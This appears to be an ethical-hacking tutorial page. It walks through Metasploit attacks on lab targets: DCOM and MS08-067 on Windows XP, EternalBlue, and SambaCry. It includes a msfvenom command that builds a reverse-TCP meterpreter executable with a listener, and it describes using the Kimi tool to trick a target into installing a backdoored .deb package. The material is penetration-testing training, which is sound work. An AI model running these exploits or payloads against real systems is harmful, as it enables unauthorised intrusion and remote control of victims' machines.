Introduction of Metasploit Framework
Metasploit Framework is a powerful open-source penetration testing platform that enables security professionals to identify and exploit vulnerabilities in computer systems. It provides a comprehensive suite of tools and resources for assessing and securing networks, making it a valuable asset in ethical hacking and cybersecurity assessments.
Console Based Exploitation 1 —> Windows XP SP 0
Console Based Exploitation 2 —> Windows XP SP 2
Kimi Framework
Terminologies
=============
1. Vulnerabilities
2. Exploit
3. Payload
4. Backdoor
5. Covering Traces
Terms
=====
RHOST –> Remote Host —> Target’s IP Address
RPORT –> Remote Port –> The port number of target machine on which a vulnerable service is running
LHOST –> Listening Host –> Attacker’s IP Address
LPORT –> Listening Port –> The port number on which an attacker is listening
EXPLOIT – 1 in Metasploit Framework
———–
Reuirements
XP Service Pack 0
Kali Linux —> Updates
Metasploit Framework
Steps:
——
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search dcom
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit
EXPLOIT – 2 in Metasploit Framework
———–
Reuirements
XP Service Pack 2
Kali Linux —> Updates
Metasploit Framework
Steps:
——
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search ms08-067/netapi
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit
KiMi Framework
==============
It is a framework for exploiting linux based OS. It is named after a character of Naruto –> Kimimaro. In this framework, we create a malicious file of extension .deb —> debian file extension. We ask the target to install that debian package. as soon as the target install the debian package, we will receive a meterpreter session.
We need to download this framework from github
https://github.com/ChaitanyaHaritash/kimi
Clone or copy —> click
Copy the link
Open the linux teminal and type
#git clone https://github.com/ChaitanyaHaritash/kimi.git
#cd kimi
#python kimi.py -h —–> help page
https://www.offensive-security.com/metasploit-unleashed/
Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
Console Based Exploitation 3
Windows 7 –> Eternal Blue
Samba Cry –> Eternal Red
Application Based Exploitation
Payload Based Exploitation
Post Exploitation –> Local Privilidge Escalation
GUI Based Exploitation –> Armitage
Console Based Exploitation 3
—————————-
Eternal Blue –> NSA Exploit leaked by Shadow Brokers
EternalBlue-Double Pulsar
dll –> Dynamic Linked Library File
Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
Shadow Brokers —> Fuzzbunch.py
Empire –> MSF of NSA
Metasploit Module
Steps in Metasploit Framework
=====
Open a terminal
1. #arp-scan –local
Target IP Address –> 192.168.228.138
2. #nmap 192.168.228.138
3. #nmap -sS -sC -sV 192.168.228.138
4. #nmap 192.168.228.138 –script vuln
CVE-2017-0143
Open another terminal, start metasploit framework
5. #msfconsole
6. #search CVE-2017-0143
7. #use auxiliary/scanner/smb/smb_ms17_010
8. #options
9. #set rhosts 192.168.228.138
10. #options
11. #run
Host is vulnerable to the exploit
12. #use exploit/windows/smb/ms17_010_eternalblue
13. #show options
14. #set rhost 192.168.228.138
15. #options
16. #exploit
C:/Windows/System32> –> I got the access of the command prompt
For Changing the payload
set payload windows/meterpreter/reverse_tcp
Samba Cry – Eternal Red Metasploit Framework
=======================
Is the vulnerability for Linux Based OS. SMBv2.
NSA Exploit leaked by Shadow Brokers.
Open a terminal
1. #arp-scan –local
Target IP Address –> 192.168.228.151
2. #nmap 192.168.228.151
3. #nmap -sS -sC -sV 192.168.228.151
4. #nmap 192.168.228.151 –script vuln
Open another terminal, start metasploit framework
5. #search is_known_pipename
6. #search cve-2017-7494
exploit/linux/samba/is_known_pipename
7. #use exploit/linux/samba/is_known_pipename
8. #info
9. #options
10. #set rhost 192.168.228.151
11. #run
Will Give me raw shell –> Bash Shell
Application Based Exploitation Metasploit Framework
==============================
Open the terminal, start with msfconsole
1. #msfconsole
2. #search payload/windows/meterpreter
payload/windows/meterpreter/reverse_tcp –> use
payload/windows/meterpreter_reverse_tcp
payload/windows/meterpreter/reverse_http
payload/windows/meterpreter_reverse_tcp
Open Another Terminal, for creating a payload – stub
3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
-p –> selecting the payload
windows/meterpreter/reverse_tcp –> is the payload
lhost –> attacker’s IP Address
lport –> Listening attacker’s port
-f –> file format
exe –> executable file
> –> destination of the output
/root/Desktop/prasheel.exe –> is the output file
Go back to the first terminal, exploit, set the listening server
4. #use exploit/multi/handler
5. #show options
6. #set payload windows/meterpreter/reverse_tcp
7. #show options
8. #set lport 8989
9. #set lhost 192.168.0.25
10. #exploit
Armitage –> GUI Based Exploitation
Graphical Version of Metasploit Framework
Follow Us On Cyber Point Solution Youtube Channel : Click Here
Follow Us on Social Platforms to get Updated : twiter, facebook, Google Plus
Learn More Ethical Hacking and Cyber Security click on this link. cyber security